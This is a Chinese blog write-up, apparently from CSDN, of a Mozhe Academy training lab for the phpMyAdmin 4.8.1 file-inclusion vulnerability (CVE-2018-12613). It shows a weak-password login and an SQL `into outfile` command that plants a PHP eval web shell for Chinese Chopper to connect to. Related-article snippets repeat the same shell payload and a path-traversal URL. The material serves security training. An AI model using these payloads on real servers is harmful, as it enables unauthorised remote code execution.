墨者学院_phpMyAdmin后台文件包含分析溯源

最新推荐文章于 2025-09-17 15:31:01 发布
原创 最新推荐文章于 2025-09-17 15:31:01 发布 · 2.6k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#墨者学院 #phpMyAdmin #分析溯源

本文介绍了phpMyAdmin 4.8.1版本中的一个远程文件包含漏洞(CVE-2018-12613),详细解析了利用过程。内容包括如何通过弱口令登录,使用SQL注入创建恶意PHP文件,并通过菜刀进行远程控制。此外,还展示了如何利用该漏洞执行PHP代码,如显示系统信息。

墨者学院_phpMyAdmin后台文件包含分析溯源

在这里插入图片描述
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,
通过二次编码即可绕过检查,造成远程文件包含漏洞。
受影响版本:
phpMyAdmin 4.8.0和4.8.1受到影响
前台可以使用弱口令直接登录

1.打开靶场,看见登录窗口,使用弱口令登录(root,root)
在这里插入图片描述
2.在mysql下使用:select “<?php eval($_POST[hack]);?>” into outfile “/var/www/html/3.php”
这里的hack是菜刀连接时候需要的口令
菜刀使用的链接是:http://219.153.49.228:48959/3.php
包含session文件。本次使用/tmp/sess_sessionid
在数据库窗口写入:
select “<?php eval($_POST[hack]);?>” into outfile “/var/www/html/3.php” --> 这句是可以和菜刀连接的
select “<?php phpinfo();?>” into outfile “/var/www/html/3.php” --> 这句是在浏览器可以看到的

最低0.47元/天 解锁文章
cc_de_csdn
关注
墨者学院10 phpMyAdmin后台文件包含分析溯源
weixin_42789937的博客
02-12 651
墨者学院10 phpMyAdmin后台文件包含分析溯源,本文整理了评论区的三种解法,解题过程七分靠技术,三分靠运气~
墨者】靶场练习——phpMyAdmin后台文件包含分析溯源
weixin_63082823的博客
12-12 782
首先我们启动靶场,点击访问就会跳转到phpMyAdmin的登陆页面,我们使用弱口令root,root登录。
墨者学院-phpMyAdmin后台文件包含分析溯源
JimWu的博客
09-04 707
phpMyAdmin后台文件包含分析溯源 难易程度:★ 题目类型:文件包含 使用工具:FireFox浏览器、菜刀 1.打开靶场,出现登录页面。 2.使用弱口令root root成功登录。 3.打开sql,使用sql语句进行一句话木1马注入。 4.输入 select ‘<?php @eval($_POST[123])?>;’ into outfile ‘/var/www/html/12...
墨者学院——phpMyAdmin后台文件包含分析溯源
知足且坚定,温柔且上进
02-09 636
此题利用一句话木马 进入登陆界面,用burpsuite爆破得到username与password都为:root 进入SQL界面,输入一句话木马(密码为leo),点击“执行”: select "<?php eval($_post[leo]);?>" into outfile "/var/www/html/3.php" 此时打开蚁剑(注意:url后面记得跟上一句话木马目标的页面3....
2025最新渗透测试靶场推荐,从零基础入门到精通,收藏这一篇就够了!
最新发布
ewii12567的博客
09-17 1334
本文精选了25个网络安全渗透测试靶场平台,涵盖从入门到高阶的各类实战环境,包括国际知名平台Hack The Box、Try Hack Me,国内墨者学院、春秋云镜,以及专项练习平台DVWA、SQL-LABS等。
墨者学院---phpMyAdmin后台文件包含分析溯源--解题思路
weixin_43071873的博客
08-27 653
进入后台,使用弱口令尝试登入 如admin~admin,root-root等 本题为root-root 点到SQL,发现可以进行sql语句 select ‘<?php eval($_POST[giao]);?>’ into outfile ‘/var/www/html/2.php’ 3.执行成功 4.上菜刀 5.在根目录可以找到本题所需要的key 在www/html目录中可以找到写入的一句话木马 ...
07#墨者靶场-phpMyAdmin后台文件包含分析溯源
shy的博客
11-22 1703
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 1.在墨者学院找到...
墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)
曹振国的博客
06-15 5730
phpMyAdmin第一种:一、利用burp爆破出账号密码二、尝试写马连入蚁剑1.发现MySQL对导入导出没做任何限制2.查询日志3.利用日志写文件4.访问写入的日志文件6.尝试直接通过into outfile写入一句话木马7.访问phpinfo文件,并连接蚁剑得到key值第二种:一、下载index.php文件进行分析1.发现55到63行存在问题二、下载Core.php进行分析1.找到checkPageValidity函数,在第443行2.查看白名单数组$whitelist3.包含根目录下的key.txt得
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源
qq_43233085的博客
01-13 959
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞的利用方式。 解题方向 根据漏洞编号找到相关知识。 解题步骤 启动靶场...
墨者学院 - PHP本地包含漏洞代码溯源
多崎巡礼的博客
09-25 803
  根据r.php源码构造本地文件读取url:/r.php?p=../../../../../../../the_key_is_here done
墨者学院PHP本地包含漏洞代码溯源
liangzi321321的博客
09-03 552
打开靶场显示的是一个看似普通的网页,查看网页源码,发现有一些注释 <!--r.php文件源码如下 本关通关key保存在系统根目录the_key_is_here.txt中 -> <?php $p=($_GET["p"].".txt"); $pics=file($p); for($i=0;$i< count($pics);$i++) { echo $pics[$i]; ...
CVE-2018-12613 PhpMyadmin后台文件包含分析
热门推荐
3569
06-27 1万+
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...
phpMyAdmin后台文件包含分析溯源
asd158923328的博客
08-20 1565
靶场地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 根据题意 进入访问页 弱口令进入,账号root,密码root 进入SQL执行 使用菜刀连接服务器 在根目录下我们发现key.txt文件 打开查看 ...
phpmyadmin使用@符号绕过登录漏洞
fengling132的专栏
05-14 3665
这个漏洞好像还蛮隐秘的,今天就说下吧 影响版本: phpmyadmin 2.11.3 phpmyadmin 2.11.4 利用方式: 直接在phpmyadmin的用户名内填入: ‘localhost’@'@” 不用填入密码,可以直接登录,管理权限哦。[......]
phpmyadmin
hanyuce的博客
08-10 863
phpmyadmin 前面我们分布部署了lamp 过程在https://blog.youkuaiyun.com/hanyuce/article/details/99095236 php端操作 下载phpMyAdmin压缩包 [root@daxiong ~]# cd /usr/src/ [root@daxiong src]# wget https://files.phpmyadmin.net/phpMyAdmi...
mysql注入ctf_CTF考点总结-sql注入
weixin_36488760的博客
01-28 1272
整理下sql相关知识,查漏补缺(长期更新)常用语句及知识information_schema包含了大量有用的信息,例如下图mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以使用可以修改这个值,那么就可以修改任意用户的密码当前用户:select user()数据库版本:select version() , select @@versi...
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 6331
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
phpmyadmin文件包含
rede
04-22 549
phpmyadmin文件包含 CVE-2018-12613 — 本地文件包含造成远程代码执行漏洞复现,其实就是我们常见的LFI漏洞。在我前面写的博客里面又详细介绍。这次我们直接进入墨者学院进行复现,不再自行搭建环境。 进入环境 这里使用弱口令进入,账号root,密码root。 进入之后页面如下: 执行sql语句挂入一句话木马 进入SQL执行页面 点击执行。 使用中国菜刀连接服务器 在根...
墨者学院phpMyAdmin后台文件包含分析溯源
12-28
### PHPMyAdmin 文件包含漏洞分析溯源 #### 背景介绍 PHPMyAdmin 是一款广泛使用的 MySQL 数据库管理工具,允许管理员通过 Web 界面执行各种数据库操作。然而,在某些版本中存在安全漏洞,可能导致远程攻击者利用...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值